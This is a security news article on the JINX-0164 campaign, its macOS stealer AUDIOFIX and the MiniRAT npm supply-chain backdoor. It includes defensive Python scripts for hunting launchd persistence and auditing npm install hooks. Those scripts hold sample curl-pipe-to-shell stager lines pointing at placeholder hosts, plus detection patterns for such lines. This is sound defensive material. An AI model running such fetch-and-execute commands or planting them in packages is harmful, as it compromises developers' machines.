
A previously undocumented threat actor has been observed targeting cryptocurrency organizations in a campaign that combines recruitment-themed social engineering with custom-built macOS malware to steal digital assets.
“These campaigns utilized advanced social engineering techniques, custom macOS malware, and deep targeting of CI/CD infrastructure,” said Wiz researchers Shira Ayal, Eden Abergil, Andre Maccarone, Yuval Dunn, and Benjamin Reed. “The techniques used allowed the attacker to move laterally from the compromised employee’s laptop to code distribution systems and development infrastructure.”
Wiz, the Google-owned cloud security company, is tracking the activity under the name JINX-0164. The threat actor has been active since at least mid-2025, is assessed to be financially motivated, and targets developers with recruiting lures and other social engineering techniques in order to siphon cryptocurrency. In at least one case, the adversaries are said to have carried out a supply chain attack.
The attack chain documented by Wiz shows JINX-0164 approaching victims from trusted-looking LinkedIn profiles and offering a virtual meeting. The meeting invitation directs the target to a fraudulent domain masquerading as a teleconferencing provider.
From there, victims are tricked into downloading and installing the purported meeting software. This triggers the retrieval of a Python-based macOS infostealer and remote access trojan codenamed AUDIOFIX by means of a bash script hosted on a fake driver store domain (apple.driver-store[.]com).
“The script downloaded an architecture-aware payload from the same domain that is compatible with both Intel and Apple Silicon systems. The payload masqueraded as a system audio driver named coreaudiod, was saved as ChromeUpdater, and was executed via launchctl,” Wiz said.
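A binary that calls itself a system audio daemon but runs from a user-writable path via launchctl is exactly the kind of persistence a defender can hunt for in LaunchAgent and LaunchDaemon plists. The script below is an added example written for this article, not Wiz's tooling or anything from the campaign: it parses launchd plists with the standard-library plistlib, flags jobs that mimic coreaudiod or ChromeUpdater from outside the system binary directories (the genuine coreaudiod lives at /usr/sbin/coreaudiod), and flags always-on jobs for non-system binaries. The two plists it scans are constructed sample data, not real artifacts; the path /Users/dev/Library/Application Support/ChromeUpdater is hypothetical.

```python
"""Hunt for suspicious launchd persistence of the kind described above.

Added example (not Wiz's code). Parses LaunchAgent/LaunchDaemon plists and
flags jobs whose executable impersonates a system daemon or a vendor updater
while running from a location a user (or malware) can write to.
"""
import os
import plistlib
import tempfile

# Directories where genuine Apple-shipped daemons live. Anything claiming to be
# a system component but executing from elsewhere is suspect.
SYSTEM_BIN_DIRS = ("/usr/sbin", "/usr/bin", "/usr/libexec", "/System/", "/sbin", "/bin")
# Names used by the campaign's payload (lower-cased for comparison).
MIMICKED_NAMES = {"coreaudiod", "chromeupdater"}
# Scratch locations no legitimate launchd job should run its binary from.
SCRATCH_PREFIXES = ("/tmp/", "/private/tmp/", "/Users/Shared/")


def program_path(plist):
    """Return the executable a launchd job runs (Program wins over ProgramArguments[0])."""
    if "Program" in plist:
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else ""


def triage_plist(path):
    """Return the reasons a plist looks like malicious persistence; [] if it looks clean."""
    with open(path, "rb") as f:
        plist = plistlib.load(f)
    prog = program_path(plist)
    if not prog:
        return []
    reasons = []
    name = os.path.basename(prog).lower()
    label = str(plist.get("Label", "")).lower()
    outside_system = not prog.startswith(SYSTEM_BIN_DIRS)
    if name in MIMICKED_NAMES and outside_system:
        reasons.append(f"{name} executed from non-system path {prog}")
    if any(m in label for m in MIMICKED_NAMES) and outside_system:
        reasons.append(f"label {label!r} mimics a system/vendor component but runs {prog}")
    if prog.startswith(SCRATCH_PREFIXES) or "/Library/Caches/" in prog:
        reasons.append(f"executable lives in a scratch or cache location: {prog}")
    if plist.get("RunAtLoad") and plist.get("KeepAlive") and outside_system:
        reasons.append("RunAtLoad + KeepAlive for a binary outside the system directories")
    return reasons


def hunt(directory):
    """Scan every .plist in directory; return {filename: reasons} for flagged jobs."""
    findings = {}
    for fn in sorted(os.listdir(directory)):
        if fn.endswith(".plist"):
            reasons = triage_plist(os.path.join(directory, fn))
            if reasons:
                findings[fn] = reasons
    return findings


# Constructed sample plists (not real artifacts): one benign job pointing at the
# genuine coreaudiod path, one modelled on the campaign's ChromeUpdater persistence.
SAMPLES = {
    "com.apple.sample.plist": {
        "Label": "com.apple.sample",            # hypothetical benign job
        "ProgramArguments": ["/usr/sbin/coreaudiod"],
        "RunAtLoad": True,
    },
    "com.google.chromeupdater.plist": {
        "Label": "com.google.ChromeUpdater",      # hypothetical malicious job
        "ProgramArguments": ["/Users/dev/Library/Application Support/ChromeUpdater", "--daemon"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
}


def demo():
    """Write the sample plists to a temp dir and run the hunt over them."""
    with tempfile.TemporaryDirectory() as d:
        for fn, content in SAMPLES.items():
            with open(os.path.join(d, fn), "wb") as f:
                plistlib.dump(content, f)
        return hunt(d)


if __name__ == "__main__":
    for fn, reasons in demo().items():
        print(fn)
        for r in reasons:
            print("  -", r)
```

On a live Mac, point hunt() at ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons; the heuristics are deliberately narrow, so treat a hit as a lead for triage (check the binary's code signature and hash) rather than a verdict.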

The attackers then use the Python malware to steal sensitive data from compromised endpoints, move laterally to internal code distribution systems and development infrastructure by injecting AUDIOFIX payloads, and modify source code so as to compromise further endpoints and steal cryptocurrency wallet credentials.
Captured data includes: credentials from password managers, web browsers, and iCloud Keychain files; local administrator credentials; SSH keys; configuration files; console history files; cryptocurrency browser extension data; cryptocurrency wallet addresses; and active Discord, Slack, and Telegram sessions.

In addition to information theft, AUDIOFIX supports several commands that allow manual reconnaissance, data exfiltration, execution of arbitrary shell commands, deletion of files, and retrieval of additional payloads from external servers.
JINX-0164 has also been observed targeting software developers by impersonating recruiters and using the same social engineering playbook: the attackers set up a meeting, display a fake technical error during it, and instruct the victim to download a “fix” that installs the malware.
Another key component of the threat actor’s arsenal is MiniRAT, a Go-based backdoor that was previously distributed via a compromised version of the npm package @velora-dex/sdk, a legitimate DeFi toolkit used for token swaps, limit orders, and delta trading on the VeloraDEX decentralized exchange platform.
According to details shared by SafeDep and StepSecurity last month, the compromised version downloaded a shell script from a remote server, which in turn dropped a macOS-specific binary, MiniRAT. The malware can upload files, execute arbitrary shell commands, and fetch additional payloads and tools from attacker-controlled domains.
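A package that reaches out to a remote server and executes what it fetches is the supply chain pattern a developer can screen for before code runs. The auditor below is an added example written for this article, not SafeDep’s, StepSecurity’s, or Wiz’s tooling, and it does not reproduce the @velora-dex/sdk payload: it walks a node_modules tree, reads each package.json, and flags install-time lifecycle hooks (preinstall, install, postinstall, prepare) that pipe a download into a shell, reference a URL, or run a bundled script that itself touches the network or child_process. The page does not say whether the compromised package used an install hook or ran at import time; this check covers the install-hook route. The three packages it scans (benign-native, @evil-scope/sdk, stager) and the example.invalid URLs are constructed sample data.

```python
"""Screen npm packages for install hooks that fetch and run remote code.

Added example (not the tooling of any vendor named in the article). Walks a
node_modules tree and flags lifecycle scripts that behave like a stager.
"""
import json
import os
import re
import tempfile

HOOKS = ("preinstall", "install", "postinstall", "prepare")
URL_RE = re.compile(r"https?://[^\s'\"]+")
# "curl|wget ... | sh" in a single hook command.
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")
# Hook that runs a script file shipped inside the package.
LOCAL_SCRIPT_RE = re.compile(r"\b(?:node|sh|bash)\s+([\w./-]+\.(?:js|mjs|cjs|sh))")
# What we look for inside such a script.
SUSPICIOUS_JS = re.compile(r"child_process|https?://|spawn|execSync")


def inspect_hook(pkg_dir, command):
    """Return reasons a single hook command looks like a download-and-execute stager."""
    reasons = []
    if PIPE_TO_SHELL_RE.search(command):
        reasons.append("pipes a download straight into a shell")
    for url in URL_RE.findall(command):
        reasons.append(f"fetches {url} at install time")
    for script in LOCAL_SCRIPT_RE.findall(command):
        path = os.path.join(pkg_dir, script)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as f:
                hits = sorted(set(SUSPICIOUS_JS.findall(f.read())))
            if hits:
                reasons.append(f"runs {script}, which references {', '.join(hits)}")
    return reasons


def audit_tree(root):
    """Walk root (e.g. a node_modules dir); return one finding per suspicious hook."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as f:
                pkg = json.load(f)
        except (OSError, ValueError):
            continue
        scripts = pkg.get("scripts") or {}
        for hook in HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            reasons = inspect_hook(dirpath, cmd)
            if reasons:
                findings.append({"package": pkg.get("name"), "version": pkg.get("version"),
                                 "hook": hook, "command": cmd, "reasons": reasons})
    return findings


# Constructed sample tree (hypothetical package names; example.invalid is a reserved TLD).
SAMPLES = {
    "node_modules/benign-native/package.json": json.dumps(
        {"name": "benign-native", "version": "1.0.0", "scripts": {"install": "node-gyp rebuild"}}),
    "node_modules/@evil-scope/sdk/package.json": json.dumps(
        {"name": "@evil-scope/sdk", "version": "9.9.9",
         "scripts": {"postinstall": "curl -fsSL https://example.invalid/setup.sh | sh"}}),
    "node_modules/stager/package.json": json.dumps(
        {"name": "stager", "version": "0.1.0", "scripts": {"postinstall": "node scripts/setup.js"}}),
    "node_modules/stager/scripts/setup.js":
        "const { execSync } = require('child_process');\n"
        "execSync('curl -s https://example.invalid/m.sh | sh');\n",
}


def demo():
    """Materialise the sample tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as d:
        for rel, body in SAMPLES.items():
            path = os.path.join(d, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as f:
                f.write(body)
        return audit_tree(os.path.join(d, "node_modules"))


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['package']}@{finding['version']} [{finding['hook']}]: {finding['command']}")
        for r in finding["reasons"]:
            print("  -", r)
```

Run it as `audit_tree("node_modules")` after an `npm ci --ignore-scripts` so the hooks are inspected before they execute; a cleaner long-term control is to keep `ignore-scripts=true` in .npmrc and allow-list the few native packages that genuinely need a build step.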
Some aspects of the campaign, including the use of VPN services such as Astrill VPN and the focus on cryptocurrency and developers, are reminiscent of tradecraft used by multiple North Korean threat clusters such as BlueNoroff, Contagious Interview, and UNC1069. However, Wiz said that at this stage there is no infrastructure overlap connecting JINX-0164 to Pyongyang.
“Similarly, while the types of spoofed domains are similar to those used by other North Korean threat actors, JINX-0164’s infrastructure has no overlap with other publicly tracked North Korean groups,” Wiz said.
